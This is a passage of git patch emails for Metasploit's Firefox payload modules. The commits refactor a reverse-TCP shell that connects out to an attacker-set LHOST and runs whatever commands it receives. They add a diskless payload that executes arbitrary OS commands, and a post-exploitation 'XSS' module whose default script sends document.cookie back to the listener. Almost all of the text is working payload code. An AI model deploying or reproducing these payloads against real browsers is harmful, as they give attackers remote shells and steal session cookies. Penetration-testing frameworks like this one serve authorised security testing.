+          shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
         }
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
@@ -87,23 +108,24 @@ module Msf::Payload::Firefox
           process.init(sh);
           var args = [jscriptFile.path, b64];
           process.run(true, args, args.length);
+          jscriptFile.remove(true);
+          return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
         } else {
           sh.initWithPath("/bin/sh");
           process.init(sh);
-          process.run(true, ["-c", shell], 2);
-        }
-
-        if (windows) {
-          jscriptFile.remove(true);
-          return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
-        }
-        else {
+          var args = ["-c", shell];
+          process.run(true, args, args.length);
           return [readFile(stdout.path), readFile(stderr.path)];
         }
       };
     |
   end
 
+  # This file is dropped on the windows platforms to a temp file in order to prevent the
+  # cmd.exe prompt from appearing. It is executed and then deleted.
+  #
+  # @return [String] JScript that reads its command-line argument, decodes
+  # base64 and runs it as a shell command.
   def jscript_launcher
     %Q|
       var b64 = WScript.arguments(0);
diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
new file mode 100644
index 0000000000..aa382013b9
--- /dev/null
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -0,0 +1,39 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/firefox'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Firefox
+
+  def initialize(info={})
+    super(merge_info(info,
+      'Name'          => 'Firefox XPCOM execute command',
+      'Description'   => 'Runs a shell command on the OS.',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'firefox',
+      'Arch'          => ARCH_FIREFOX
+    ))
+    register_options([
+      OptString.new('CMD', [ true, "The command string to execute", 'echo HELLO; echo WORLD' ]),
+    ], self.class)
+  end
+
+  def generate
+    <<-EOS
+
+      (function(){
+        #{read_file_source}
+        #{run_cmd_source}
+        runCmd((#{JSON.unparse({:cmd => datastore['CMD']})}).cmd);
+      })();
+
+    EOS
+  end
+end
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index e9e8341fc7..4d46fcbfde 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -14,7 +14,7 @@ module Metasploit3
   include Msf::Payload::Firefox
   include Msf::Sessions::CommandShellOptions
 
-  def initialize(info = {})
+  def initialize(info={})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP (via Firefox XPCOM script)',
       'Description'   => 'Creates an interactive shell via Javascript with access to Firefox\'s XPCOM API',
@@ -24,54 +24,44 @@ module Metasploit3
       'Arch'          => ARCH_FIREFOX,
       'Handler'       => Msf::Handler::ReverseTcp,
       'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'firefox',
-      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+      'PayloadType'   => 'firefox'
     ))
   end
 
-  #
-  # Constructs the payload
-  #
   def generate
-    super + command_string
-  end
+    <<-EOS
 
-  #
-  # Returns the JS string to use for execution
-  #
-  def command_string
-    %Q|
-    (function(){
-      Components.utils.import("resource://gre/modules/NetUtil.jsm");
-      var host = '#{datastore["LHOST"]}';
-      var port = #{datastore["LPORT"]};
+      (function(){
+        Components.utils.import("resource://gre/modules/NetUtil.jsm");
+        var host = '#{datastore["LHOST"]}';
+        var port = #{datastore["LPORT"]};
 
-      var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
-                              .getService(Components.interfaces.nsISocketTransportService);
-      var socket = socketTransport.createTransport(null, 0, host, port, null);
-      var outStream = socket.openOutputStream(0, 0, 0);
-      var inStream = socket.openInputStream(0, 0, 0);
+        var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
+                                .getService(Components.interfaces.nsISocketTransportService);
+        var socket = socketTransport.createTransport(null, 0, host, port, null);
+        var outStream = socket.openOutputStream(0, 0, 0);
+        var inStream = socket.openInputStream(0, 0, 0);
 
-      var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
-                     .createInstance(Components.interfaces.nsIInputStreamPump);
-      pump.init(inStream, -1, -1, 0, 0, true);
+        var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                       .createInstance(Components.interfaces.nsIInputStreamPump);
+        pump.init(inStream, -1, -1, 0, 0, true);
 
-      var listener = {
-        onStartRequest: function(request, context) {},
-        onStopRequest: function(request, context) {},
-        onDataAvailable: function(request, context, stream, offset, count)
-        {
-          var data = NetUtil.readInputStreamToString(stream, count).trim();
-          var output = runCmd(data);
-          outStream.write(output[0], output[0].length);
-        }
-      };
+        var listener = {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            var output = runCmd(data);
+            outStream.write(output[0], output[0].length);
+          }
+        };
 
-      #{read_file_source}
-      #{run_cmd_source}
+        #{read_file_source}
+        #{run_cmd_source}
 
-      pump.asyncRead(listener, null);
-    })();
-    |
+        pump.asyncRead(listener, null);
+      })();
+
+    EOS
   end
 end

From 60991b08ebcaaf142f0bdcd7f1e8dd50695c0704 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Fri, 3 Jan 2014 18:40:31 -0600
Subject: [PATCH 13/24] Whitespace tweak.

---
 lib/msf/core/exploit/remote/firefox_addon_generator.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
index 20eca6d76a..710740512e 100644
--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -14,7 +14,7 @@ module Exploit::Remote::FirefoxAddonGenerator
   include Msf::Exploit::EXE
 
   # Add in the supported datastore options
-  def initialize(info = {})
+  def initialize(info={})
     super(update_info(info,
       'Platform'      => %w{ java linux osx solaris win },
       'Payload'       => { 'BadChars' => '', 'DisableNops' => true },

From b9c46cde4741c99b8cd4e3f77a4a0038dd5aea19 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 4 Jan 2014 08:46:41 -0600
Subject: [PATCH 14/24] Refactor runCmd, allow js exec.

* Updates exec payload to not touch disk
* Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options)
---
 lib/msf/core/payload/firefox.rb    | 38 +++++++++-----
 modules/post/firefox/gather/xss.rb | 84 ++++++++++++++++++++++++++++++
 2 files changed, 109 insertions(+), 13 deletions(-)
 create mode 100644 modules/post/firefox/gather/xss.rb

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 5670fede5e..ad5aefe845 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -34,7 +34,7 @@ module Msf::Payload::Firefox
     |
   end
 
-  # Javascript source code of runCmd(str) - runs a shell command on the OS
+  # Javascript source code of runCmd(str,cb) - runs a shell command on the OS
   #
   # Because of a limitation of firefox, we cannot retrieve the shell output
   # so the stdout/err are instead redirected to a temp file, which is read and
@@ -44,20 +44,38 @@ module Msf::Payload::Firefox
   # which redirects stdout.
   #
   # On windows, the command is wrapped in two "cmd /c" calls, the outer of which
-  # redirects stdout. A JScript file "launch" file is then used to run the command
-  # without displaying the command prompt.
+  # redirects stdout. A JScript "launch" file is dropped and invoked with wscript
+  # to run the command without displaying the cmd.exe prompt.
+  #
+  # When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
+  # javascript code between the tags is eval'd and returned.
   #
   # @return [String] javascript source code that exposes the runCmd(str) method.
   def run_cmd_source
     %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var windows = (ua.indexOf("Windows")>-1);
       var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
-      var runCmd = function(cmd) {
+      var runCmd = function(cmd, cb) {
+        var echo = function(str) {
+          if(!str \|\| !str.length) return '';
+          var e = str.match(/echo ['"]?([^;\\s"']+)/);
+          return (e && e[1]) \|\| '';
+        }
+        var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
+        if (js) {
+          var wcmd = (windows) ? cmd+"\\n" : '';
+          var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
+          Function('cb', js[1])(function(r) {
+            cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
+          })
+          return;
+        }
+
         var shEsc = "\\\\$&";
         var shPath = "/bin/sh -c"
-        var windows = (ua.indexOf("Windows")>-1);
 
         if (windows) {
           shPath = "cmd /c";
@@ -78,18 +96,12 @@ module Msf::Payload::Firefox
         }
 
         var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
-        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
 
         var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
           .getService(Components.interfaces.nsIProperties)
           .get("TmpD", Components.interfaces.nsIFile);
         stdout.append(stdoutFile);
 
-        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stderr.append(stderrFile);
-
         if (windows) {
           var shell = shPath+" "+cmd;
           shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
@@ -109,13 +121,13 @@ module Msf::Payload::Firefox
           var args = [jscriptFile.path, b64];
           process.run(true, args, args.length);
           jscriptFile.remove(true);
-          return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
+          cb(cmd+"\\n"+readFile(stdout.path));
         } else {
           sh.initWithPath("/bin/sh");
           process.init(sh);
           var args = ["-c", shell];
           process.run(true, args, args.length);
-          return [readFile(stdout.path), readFile(stderr.path)];
+          cb(readFile(stdout.path));
         }
       };
     |
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
new file mode 100644
index 0000000000..c6e77453c4
--- /dev/null
+++ b/modules/post/firefox/gather/xss.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Firefox XSS',
+      'Description'   => %q{
+        This module runs the provided SCRIPT as javascript in the
+        origin of the provided URL. It works by navigating a hidden
+        ChromeWindow to the URL, then injecting the SCRIPT with Function.
+
+        The value returned by SCRIPT is sent back to the Metasploit instance.
+        The callback "send(result)" can also be used to return data for
+        asynchronous scripts.
+
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'Platform'      => [ 'firefox' ]
+    ))
+
+    register_options([
+      OptString.new('SCRIPT', [true, "The javascript command to run", 'return document.cookie']),
+      OptPath.new('SCRIPTFILE', [false, "The javascript file to run"]),
+      OptString.new('URL', [
+        true, "URL to inject into", 'http://metasploit.com'
+      ]),
+      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
+    ], self.class)
+  end
+
+  def run
+    results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
+
+    if results.present?
+      print_good results
+    else
+      print_error "No response received"
+    end
+  end
+
+  def js_payload
+    js = datastore['SCRIPT'].strip
+    %Q|
+
+      (function(){
+        var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
+                               .getService(Components.interfaces.nsIAppShellService)
+                               .hiddenDOMWindow;
+
+        hiddenWindow.location = 'about:blank';
+        var src = (#{JSON.unparse({ :src => js })}).src;
+        var XHR = hiddenWindow.XMLHttpRequest;
+        var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
+        hiddenWindow[key] = true;
+        hiddenWindow.location = "#{datastore['URL']}";
+        
+        var evt = function() {
+          if (hiddenWindow[key]) {
+            schedule(evt);
+          } else {
+            schedule(function(){
+              cb(hiddenWindow.Function(src)());
+            }, 500);
+          }
+        };
+
+        var schedule = function(cb, delay) {
+          var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
+          timer.initWithCallback({notify:cb}, delay\|\|200, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
+          return timer;
+        };
+
+        schedule(evt);
+      })();
+
+    |.strip
+  end
+end

From fdca396bc87817563c52f517e20bae2132675b18 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 4 Jan 2014 08:48:58 -0600
Subject: [PATCH 15/24] Update exec to be diskless.

---
 modules/payloads/singles/firefox/exec.rb | 36 ++++++++++++++++++++----
 1 file changed, 31 insertions(+), 5 deletions(-)

diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index aa382013b9..4cfcf89783 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -14,14 +14,21 @@ module Metasploit3
   def initialize(info={})
     super(merge_info(info,
       'Name'          => 'Firefox XPCOM execute command',
-      'Description'   => 'Runs a shell command on the OS.',
+      'Description'   => %Q|
+        Runs a shell command on the OS. Never touches the disk.
+
+        On Windows, this command will flash the command prompt momentarily.
+        You can avoid this by setting WSCRIPT to true, which drops a jscript
+        "launcher" to disk that hides the prompt.
+      |,
       'Author'        => ['joev'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'firefox',
       'Arch'          => ARCH_FIREFOX
     ))
     register_options([
-      OptString.new('CMD', [ true, "The command string to execute", 'echo HELLO; echo WORLD' ]),
+      OptString.new('CMD', [true, "The command string to execute", 'touch /tmp/a.txt']),
+      OptBool.new('WSCRIPT', [true, "On Windows, drop a vbscript to hide the cmd prompt", false])
     ], self.class)
   end
 
@@ -29,9 +36,28 @@ module Metasploit3
     <<-EOS
 
       (function(){
-        #{read_file_source}
-        #{run_cmd_source}
-        runCmd((#{JSON.unparse({:cmd => datastore['CMD']})}).cmd);
+        #{read_file_source if datastore['WSCRIPT']}
+        #{run_cmd_source if datastore['WSCRIPT']}
+
+        var cmd = (#{JSON.unparse({ :cmd => datastore['CMD'] })}).cmd;
+        if (#{datastore['WSCRIPT']} && windows) {
+           runCmd(cmd);
+        } else {
+          var process = Components.classes["@mozilla.org/process/util;1"]
+                          .createInstance(Components.interfaces.nsIProcess);
+          var sh = Components.classes["@mozilla.org/file/local;1"]
+                    .createInstance(Components.interfaces.nsILocalFile);
+          var args;
+          if (windows) {
+            sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");
+            args = ["/c", cmd];
+          else {
+            sh.initWithPath("/bin/sh");
+            args = ["-c", cmd];
+          }
+          process.init(sh);
+          process.run(true, args, args.length);
+        }
       })();
 
     EOS

From 4329e5a21eb1cab58a6b8dca885575840a8b9d56 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 4 Jan 2014 08:49:43 -0600
Subject: [PATCH 16/24] Update firefox payloads to use async runCmd.

---
 modules/payloads/singles/firefox/shell_bind_tcp.rb    | 5 +++--
 modules/payloads/singles/firefox/shell_reverse_tcp.rb | 5 +++--
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 278531ea46..0c59c12b3d 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -66,8 +66,9 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            var output = runCmd(data);
-            outStream.write(output[0], output[0].length);
+            runCmd(data, function(output) {
+              outStream.write(output, output.length);
+            });
           }
         };
       };
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index 4d46fcbfde..ecc889cfbb 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -51,8 +51,9 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            var output = runCmd(data);
-            outStream.write(output[0], output[0].length);
+            runCmd(data, function(output) {
+              outStream.write(output, output.length);
+            });
           }
         };
 

From f2f68a61aaab6976c897d512499ff64b45aab53b Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 4 Jan 2014 19:00:36 -0600
Subject: [PATCH 17/24] Use shell primitives instead of resorting to echo
 hacks.

---
 lib/msf/core/payload/firefox.rb    | 18 ++++++------------
 modules/post/firefox/gather/xss.rb | 15 ++++++++++-----
 2 files changed, 16 insertions(+), 17 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index ad5aefe845..765b8ec290 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -47,7 +47,7 @@ module Msf::Payload::Firefox
   # redirects stdout. A JScript "launch" file is dropped and invoked with wscript
   # to run the command without displaying the cmd.exe prompt.
   #
-  # When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
+  # When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
   # javascript code between the tags is eval'd and returned.
   #
   # @return [String] javascript source code that exposes the runCmd(str) method.
@@ -59,18 +59,12 @@ module Msf::Payload::Firefox
       var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd, cb) {
-        var echo = function(str) {
-          if(!str \|\| !str.length) return '';
-          var e = str.match(/echo ['"]?([^;\\s"']+)/);
-          return (e && e[1]) \|\| '';
-        }
-        var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
+        if (cmd.trim().length == 0) return;
+
+        var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
         if (js) {
-          var wcmd = (windows) ? cmd+"\\n" : '';
-          var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
-          Function('cb', js[1])(function(r) {
-            cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
-          })
+          var tag = "[!JAVASCRIPT]";
+          Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });
           return;
         }
 
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index c6e77453c4..6dbc6c40b7 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -35,7 +35,8 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
+    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
+    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
 
     if results.present?
       print_good results
@@ -48,15 +49,15 @@ class Metasploit3 < Msf::Post
     js = datastore['SCRIPT'].strip
     %Q|
 
-      (function(){
+      (function(send){
         var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
                                .getService(Components.interfaces.nsIAppShellService)
                                .hiddenDOMWindow;
 
         hiddenWindow.location = 'about:blank';
         var src = (#{JSON.unparse({ :src => js })}).src;
-        var XHR = hiddenWindow.XMLHttpRequest;
         var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
+
         hiddenWindow[key] = true;
         hiddenWindow.location = "#{datastore['URL']}";
         
@@ -65,7 +66,11 @@ class Metasploit3 < Msf::Post
             schedule(evt);
           } else {
             schedule(function(){
-              cb(hiddenWindow.Function(src)());
+              try {
+                send(hiddenWindow.Function('send', src)(send));
+              } catch (e) {
+                send("Error: "+e.message);
+              }
             }, 500);
           }
         };
@@ -77,7 +82,7 @@ class Metasploit3 < Msf::Post
         };
 
         schedule(evt);
-      })();
+      })(send);
 
     |.strip
   end

From 723c0480ab3f3831ba760fd5f686e530d598eeb2 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 4 Jan 2014 19:06:01 -0600
Subject: [PATCH 18/24] Fix description to be accurate.

---
 modules/post/firefox/gather/xss.rb | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)

diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index 6dbc6c40b7..e92b044acf 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -13,11 +13,7 @@ class Metasploit3 < Msf::Post
         This module runs the provided SCRIPT as javascript in the
         origin of the provided URL. It works by navigating a hidden
         ChromeWindow to the URL, then injecting the SCRIPT with Function.
-
-        The value returned by SCRIPT is sent back to the Metasploit instance.
-        The callback "send(result)" can also be used to return data for
-        asynchronous scripts.
-
+        The callback "send(result)" is used to send data back to the listener.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'joev' ],
@@ -25,7 +21,7 @@ class Metasploit3 < Msf::Post
     ))
 
     register_options([
-      OptString.new('SCRIPT', [true, "The javascript command to run", 'return document.cookie']),
+      OptString.new('SCRIPT', [true, "The javascript command to run", 'send(document.cookie)']),
       OptPath.new('SCRIPTFILE', [false, "The javascript file to run"]),
       OptString.new('URL', [
         true, "URL to inject into", 'http://metasploit.com'

From d00acccd4f3c6619f623982cc2f0bbfb14134260 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sat, 4 Jan 2014 21:22:47 -0600
Subject: [PATCH 19/24] Remove Java target, since it no longer works.

---
 .../exploit/remote/firefox_addon_generator.rb | 24 -------------------
 .../remote/firefox_addon_generator_spec.rb    |  6 +----
 2 files changed, 1 insertion(+), 29 deletions(-)

diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
index 710740512e..77678e4aef 100644
--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -26,12 +26,6 @@ module Exploit::Remote::FirefoxAddonGenerator
               'Arch' => ARCH_FIREFOX
             }
           ],
-          [ 'Java Payload',
-            {
-              'Platform' => 'java',
-              'Arch' => ARCH_JAVA
-            }
-          ],
           [ 'Windows x86 (Native Payload)',
             {
               'Platform' => 'win',
@@ -95,24 +89,6 @@ module Exploit::Remote::FirefoxAddonGenerator
       payload_file = nil
       payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
       payload_script = regenerate_payload(cli).encoded
-    elsif target.name =~ /Java /
-      p = regenerate_payload(cli)
-      return nil if p.nil?
-      jar = p.encoded_jar
-      jar.build_manifest(:main_class => "metasploit.Payload")
-      payload_file = jar.pack
-      payload_name='payload.jar'
-      payload_script=%q|
-        var java = Components.classes["@mozilla.org/appshell/window-mediator;1"]
-          .getService(Components.interfaces.nsIWindowMediator)
-          .getMostRecentWindow('navigator:browser').Packages.java;
-        java.lang.System.setSecurityManager(null);
-        var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
-        var m = cl.loadClass("metasploit.Payload").getMethod("main",
-          [java.lang.Class.forName("[Ljava.lang.String;")]
-        );
-        m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
-      |
     else
       payload_file = generate_payload_exe
       return nil if payload_file.nil?
diff --git a/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb b/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
index 519175e827..b6f5a7d4d0 100644
--- a/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
@@ -3,11 +3,7 @@ require 'msf/core'
 
 describe Msf::Exploit::Remote::FirefoxAddonGenerator do
   let(:datastore) { { 'TARGET' => 0 } }
-  let(:jar) {
-    j = double(:pack => '@JAR@')
-    j.stub(:build_manifest)
-    j
-  }
+  let(:jar) { double(:pack => '@JAR@', :build_manifest => nil) }
   let(:payload) { double(:encoded => '@EXE@', :encoded_jar => jar) }
   let(:framework) { double(:nops => nil) }
   let(:cli) { double }

From 3b29c370bdfe4ded1683ebcc2c5c54e2d69ca314 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sun, 5 Jan 2014 11:24:41 -0600
Subject: [PATCH 20/24] Fix bug in the firefox/exec payload.

---
 modules/payloads/singles/firefox/exec.rb | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index 4cfcf89783..f78939b46c 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -39,9 +39,13 @@ module Metasploit3
         #{read_file_source if datastore['WSCRIPT']}
         #{run_cmd_source if datastore['WSCRIPT']}
 
+        var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+        var windows = (ua.indexOf("Windows")>-1);
+
         var cmd = (#{JSON.unparse({ :cmd => datastore['CMD'] })}).cmd;
         if (#{datastore['WSCRIPT']} && windows) {
-           runCmd(cmd);
+          runCmd(cmd);
         } else {
           var process = Components.classes["@mozilla.org/process/util;1"]
                           .createInstance(Components.interfaces.nsIProcess);
@@ -51,7 +55,7 @@ module Metasploit3
           if (windows) {
             sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");
             args = ["/c", cmd];
-          else {
+          } else {
             sh.initWithPath("/bin/sh");
             args = ["-c", cmd];
           }

From 9d3b86ecf484478e3239a857ad6523e35138014a Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sun, 5 Jan 2014 14:58:18 -0600
Subject: [PATCH 21/24] Add explicit require for JSON, so msfpayload runs.

---
 lib/msf/core/payload/firefox.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 765b8ec290..1f3c0055ca 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'json'
 
 module Msf::Payload::Firefox
 

From 49d1285d1becb16e3b516be4c613daba2d4a64e9 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Mon, 6 Jan 2014 11:15:10 -0600
Subject: [PATCH 22/24] Add explicit json require.

---
 modules/post/firefox/gather/xss.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index e92b044acf..cd6cc0b5da 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'json'
 
 class Metasploit3 < Msf::Post
   def initialize(info={})

From fb1a038024e291694ee290ba06fac66350e3792d Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Tue, 7 Jan 2014 16:17:34 -0600
Subject: [PATCH 23/24] Update async API to actually be async in all cases.

This avoids zalgo. Also optionally checks the return value
of the compiled Function in XSS to allow you to use send()
or an explicit return, which is maybe more natural for
synchronous xss payloads.
---
 lib/msf/core/payload/firefox.rb               | 47 +++++++++++++++++--
 .../singles/firefox/shell_bind_tcp.rb         |  5 +-
 .../singles/firefox/shell_reverse_tcp.rb      |  5 +-
 modules/post/firefox/gather/xss.rb            | 17 ++++---
 4 files changed, 55 insertions(+), 19 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 1f3c0055ca..6bcbc75b89 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -4,6 +4,19 @@ require 'json'
 
 module Msf::Payload::Firefox
 
+
+  # Javascript source code of setTimeout(fn, delay)
+  # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
+  def set_timeout_source
+    %Q|
+      var setTimeout = function(cb, delay) {
+        var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
+        timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
+        return timer;
+      };
+    |
+  end
+
   # Javascript source code of readFile(path) - synchronously reads a file and returns
   # its contents. The file is deleted immediately afterwards.
   #
@@ -54,18 +67,44 @@ module Msf::Payload::Firefox
   # @return [String] javascript source code that exposes the runCmd(str) method.
   def run_cmd_source
     %Q|
+      #{read_file_source}
+      #{set_timeout_source}
+
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
